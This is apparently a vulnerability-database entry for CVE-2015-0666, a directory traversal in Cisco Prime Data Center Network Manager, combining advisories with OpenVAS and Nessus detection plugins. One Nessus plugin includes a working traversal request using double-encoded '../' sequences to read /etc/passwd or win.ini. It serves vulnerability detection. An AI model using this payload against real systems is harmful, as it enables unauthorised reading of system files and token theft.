Cisco Data Center Network Manager Directory Traversal Vulnerability
2015-04-14T00:00:00
ID OPENVAS:1361412562310105256 Type openvas Reporter This script is Copyright (C) 2015 Greenbone Networks GmbH Modified 2018-10-26T00:00:00
Description
Cisco Data Center Network Manager is prone to a directory-traversal
vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_cisco_prime_data_center_network_manager_73479.nasl 12106 2018-10-26 06:33:36Z cfischer $
#
# Cisco Data Center Network Manager Directory Traversal Vulnerability
#
# Authors:
# Michael Meyer <michael.meyer@greenbone.net>
#
# Copyright:
# Copyright (c) 2015 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:cisco:prime_data_center_network_manager";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.105256");
script_bugtraq_id(73479);
script_cve_id("CVE-2015-0666");
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_version("$Revision: 12106 $");
script_name("Cisco Data Center Network Manager Directory Traversal Vulnerability");
script_tag(name:"impact", value:"Exploiting this issue can allow an attacker to gain read access to
arbitrary files. Information harvested may aid in launching further attacks.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"This issue is being tracked by Cisco Bug ID CSCus00241.");
script_tag(name:"solution", value:"Update to 7.1(1) or higher.");
script_tag(name:"summary", value:"Cisco Data Center Network Manager is prone to a directory-traversal
vulnerability.");
script_tag(name:"affected", value:"Cisco Prime DCNM releases 6.3(1) and later, prior to release 7.1(1).");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_banner");
script_tag(name:"last_modification", value:"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $");
script_tag(name:"creation_date", value:"2015-04-14 14:19:43 +0200 (Tue, 14 Apr 2015)");
script_category(ACT_GATHER_INFO);
script_family("CISCO");
script_copyright("This script is Copyright (C) 2015 Greenbone Networks GmbH");
script_dependencies("gb_cisco_prime_data_center_network_manager_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("cisco_prime_dcnm/version");
exit(0);
}
include("host_details.inc");
include("version_func.inc");
if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
if( ! vers = get_app_version( cpe:CPE, port:port ) )
if( ! vers = get_kb_item("cisco_prime_dcnm/version") ) exit( 0 );
rep_vers = vers;
vers = str_replace( string:vers, find:"(", replace:".");
vers = str_replace( string:vers, find:")", replace:"");
if( version_in_range( version:vers, test_version:"6.3.1", test_version2:"7.1.0" ) )
{
report = 'Installed Version: ' + rep_vers + '\n' +
'Fixed Version: 7.1(1)\n';
security_message( port:port, data:report );
exit( 0 );
}
exit( 99 );
{"id": "OPENVAS:1361412562310105256", "type": "openvas", "bulletinFamily": "scanner", "title": "Cisco Data Center Network Manager Directory Traversal Vulnerability", "description": "Cisco Data Center Network Manager is prone to a directory-traversal\nvulnerability.", "published": "2015-04-14T00:00:00", "modified": "2018-10-26T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105256", "reporter": "This script is Copyright (C) 2015 Greenbone Networks GmbH", "references": [], "cvelist": ["CVE-2015-0666"], "lastseen": "2019-05-29T18:36:31", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-0666"]}, {"type": "nessus", "idList": ["CISCO_PRIME_DCNM_7_1_1_LOCAL.NASL", "CISCO_PRIME_DCNM_FMSERVER_DIR_TRAVERSAL.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14365"]}, {"type": "cisco", "idList": ["CISCO-SA-20150401-DCNM"]}, {"type": "zdi", "idList": ["ZDI-15-111"]}], "modified": "2019-05-29T18:36:31", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2019-05-29T18:36:31", "rev": 2}, "vulnersScore": 6.8}, "pluginID": "1361412562310105256", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_prime_data_center_network_manager_73479.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Data Center Network Manager Directory Traversal Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:prime_data_center_network_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105256\");\n script_bugtraq_id(73479);\n script_cve_id(\"CVE-2015-0666\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Data Center Network Manager Directory Traversal Vulnerability\");\n\n script_tag(name:\"impact\", value:\"Exploiting this issue can allow an attacker to gain read access to\narbitrary files. Information harvested may aid in launching further attacks.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This issue is being tracked by Cisco Bug ID CSCus00241.\");\n script_tag(name:\"solution\", value:\"Update to 7.1(1) or higher.\");\n script_tag(name:\"summary\", value:\"Cisco Data Center Network Manager is prone to a directory-traversal\nvulnerability.\");\n script_tag(name:\"affected\", value:\"Cisco Prime DCNM releases 6.3(1) and later, prior to release 7.1(1).\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-14 14:19:43 +0200 (Tue, 14 Apr 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_prime_data_center_network_manager_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"cisco_prime_dcnm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! vers = get_app_version( cpe:CPE, port:port ) )\n if( ! vers = get_kb_item(\"cisco_prime_dcnm/version\") ) exit( 0 );\n\nrep_vers = vers;\n\nvers = str_replace( string:vers, find:\"(\", replace:\".\");\nvers = str_replace( string:vers, find:\")\", replace:\"\");\n\nif( version_in_range( version:vers, test_version:\"6.3.1\", test_version2:\"7.1.0\" ) )\n{\n report = 'Installed Version: ' + rep_vers + '\\n' +\n 'Fixed Version: 7.1(1)\\n';\n\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "naslFamily": "CISCO", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:21:20", "description": "Directory traversal vulnerability in the fmserver servlet in Cisco Prime Data Center Network Manager (DCNM) before 7.1(1) allows remote attackers to read arbitrary files via a crafted pathname, aka Bug ID CSCus00241.", "edition": 6, "cvss3": {}, "published": "2015-04-03T10:59:00", "title": "CVE-2015-0666", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0666"], "modified": "2015-09-29T19:31:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager:7.0\\(1\\)", "cpe:/a:cisco:prime_data_center_network_manager:6.3\\(1\\)", "cpe:/a:cisco:prime_data_center_network_manager:7.0\\(2\\)", "cpe:/a:cisco:prime_data_center_network_manager:6.3\\(2\\)"], "id": "CVE-2015-0666", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0666", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:cisco:prime_data_center_network_manager:7.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:prime_data_center_network_manager:7.0\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:prime_data_center_network_manager:6.3\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:prime_data_center_network_manager:6.3\\(1\\):*:*:*:*:*:*:*"]}], "zdi": [{"lastseen": "2020-06-22T11:41:31", "bulletinFamily": "info", "cvelist": ["CVE-2015-0666"], "edition": 3, "description": "This vulnerability allows remote attackers to read arbitrary files, and bypass authentication, on a system with vulnerable installations of Cisco Data Center Network Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the fmserver servlet which is vulnerable to a directory traversal. An attacker can leverage this vulnerability to read arbitrary files, including operating system files, as the service is installed with SYSTEM privileges by default. An attacker can also bypass webapp authentication because the application writes access tokens to the filesystem, which can be read.", "modified": "2015-06-22T00:00:00", "published": "2015-04-03T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-111/", "id": "ZDI-15-111", "title": "Cisco Data Center Network Manager FileServlet Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "cisco": [{"lastseen": "2020-12-24T11:41:38", "bulletinFamily": "software", "cvelist": ["CVE-2015-0666"], "description": "A vulnerability in the fmserver servlet of Cisco Prime Data Center Network Manager could allow an unauthenticated, remote attacker to retrieve arbitrary files from the filesystem.\n\nThe vulnerability is due to invalid input validation on the supplied path information. An attacker could exploit this vulnerability by executing a directory traversal attack on an affected system. A successful exploit could allow the attacker to disclose arbitrary file contents on the underlying operating system that hosts the Cisco Prime DCNM application. The file contents must be readable by the System user for Cisco Prime DCNM running on Microsoft Windows, or the root user for Cisco Prime DCNM running on Linux for the attacker to exploit them.\n\nCisco Prime Data Center Network Manager (DCNM) contains a file information disclosure vulnerability that could allow an unauthenticated, remote attacker to retrieve arbitrary files from the underlying operating system.\n\nCisco has released software updates that address this vulnerability. \n\nWorkarounds that mitigate this vulnerability are not available.\n\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150401-dcnm[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150401-dcnm\"]", "modified": "2015-04-01T15:45:40", "published": "2015-04-01T16:00:00", "id": "CISCO-SA-20150401-DCNM", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150401-dcnm", "type": "cisco", "title": "Cisco Prime Data Center Network Manager File Information Disclosure Vulnerability", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-0666"], "description": "fmserver servlet directory traversal", "edition": 1, "modified": "2015-04-09T00:00:00", "published": "2015-04-09T00:00:00", "id": "SECURITYVULNS:VULN:14365", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14365", "title": "Cisco Prime Data Center Network Manager directory traversal", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2021-04-01T01:42:12", "description": "According to its self-reported version number, the Cisco Prime Data\nCenter Network Manager (DCNM) installed on the remote host is affected\nby a directory traversal vulnerability in the fmserver servlet due to\nimproper validation of user-supplied information. An unauthenticated,\nremote attacker, using a crafted file pathname, can read arbitrary\nfiles from the filesystem outside of a restricted path.", "edition": 31, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2015-04-10T00:00:00", "title": "Cisco Prime Data Center Network Manager < 7.1(1) Directory Traversal Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0666"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager"], "id": "CISCO_PRIME_DCNM_7_1_1_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/82701", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82701);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n\n script_cve_id(\"CVE-2015-0666\");\n script_bugtraq_id(73479);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus00241\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150401-dcnm\");\n\n script_name(english:\"Cisco Prime Data Center Network Manager < 7.1(1) Directory Traversal Vulnerability\");\n script_summary(english:\"Checks the DCNM version number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote host is affected\nby a directory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Cisco Prime Data\nCenter Network Manager (DCNM) installed on the remote host is affected\nby a directory traversal vulnerability in the fmserver servlet due to\nimproper validation of user-supplied information. An unauthenticated,\nremote attacker, using a crafted file pathname, can read arbitrary\nfiles from the filesystem outside of a restricted path.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150401-dcnm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d7202716\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/security/center/viewAlert.x?alertId=37810\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Cisco Prime Data Center Network Manager 7.1(1) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_data_center_network_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prime_dcnm_installed_win.nasl\", \"cisco_prime_dcnm_installed_linux.nasl\");\n script_require_ports(\"installed_sw/Cisco Prime DCNM\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"Cisco Prime DCNM\";\n\nget_install_count(app_name:appname, exit_if_zero:TRUE);\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\n\nver = install['version'];\npath = install['path'];\ndisplay_ver = install['display_version'];\n\n# Cisco Prime DCNM releases 6.3(1) and later, prior to release 7.1(1)\nif (\n (ver_compare(ver:ver, fix:'6.3.1.0', strict:FALSE) < 0 ||\n ver_compare(ver:ver, fix:'7.1.1.0', strict:FALSE) >= 0)\n) audit(AUDIT_INST_VER_NOT_VULN, appname, display_ver);\n\nport = get_kb_item('SMB/transport');\nif (!port) port = 0;\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 7.1(1)\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-04-01T01:42:12", "description": "The version of Cisco Prime Data Center Network Manager (DCNM)\ninstalled on the remote host is affected by a directory traversal\nvulnerability in the fmserver servlet due to improper validation of\nuser-supplied input. An unauthenticated, remote attacker, using a\ncrafted file pathname, can read arbitrary files from the filesystem\noutside of a restricted path.", "edition": 32, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2015-04-13T00:00:00", "title": "Cisco Prime Data Center Network Manager < 7.1(1) Directory Traversal Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0666"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager"], "id": "CISCO_PRIME_DCNM_FMSERVER_DIR_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/82740", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82740);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n\n script_cve_id(\"CVE-2015-0666\");\n script_bugtraq_id(73479);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus00241\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150401-dcnm\");\n\n script_name(english:\"Cisco Prime Data Center Network Manager < 7.1(1) Directory Traversal Vulnerability\");\n script_summary(english:\"Attempts to read a file on the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote host is affected\nby a directory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco Prime Data Center Network Manager (DCNM)\ninstalled on the remote host is affected by a directory traversal\nvulnerability in the fmserver servlet due to improper validation of\nuser-supplied input. An unauthenticated, remote attacker, using a\ncrafted file pathname, can read arbitrary files from the filesystem\noutside of a restricted path.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-15-111/\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150401-dcnm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d7202716\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/security/center/viewAlert.x?alertId=37810\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Cisco Prime Data Center Network Manager 7.1(1) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_data_center_network_manager\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prime_dcnm_web_detect.nasl\");\n script_require_keys(\"installed_sw/cisco_dcnm_web\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"Cisco Prime DCNM\";\napp_id = \"cisco_dcnm_web\";\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:app_id, port:port);\n\npath = install['path'];\ninstall_url = build_url(qs:path, port:port);\n\n# Try to retrieve a local file.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) files = make_list('/windows/win.ini', '/winnt/win.ini');\n else files = make_list('/etc/passwd');\n}\nelse files = make_list('/etc/passwd', '/windows/win.ini', '/winnt/win.ini');\n\nfile_pats = make_array();\nfile_pats['/etc/passwd'] = \"root:.*:0:[01]:\";\nfile_pats['/winnt/win.ini'] = \"^\\[[a-zA-Z]+\\]|^; for 16-bit app support\";\nfile_pats['/windows/win.ini'] = \"^\\[[a-zA-Z]+\\]|^; for 16-bit app support\";\n\nforeach file (files)\n{\n url = path + \"/fmserver/\" + crap(length:15*10, data:\"%252E%252E%252F\") + file ;\n res = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : file,\n request : make_list(build_url(qs:url, port:port)),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n );\n exit(0);\n }\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}]}
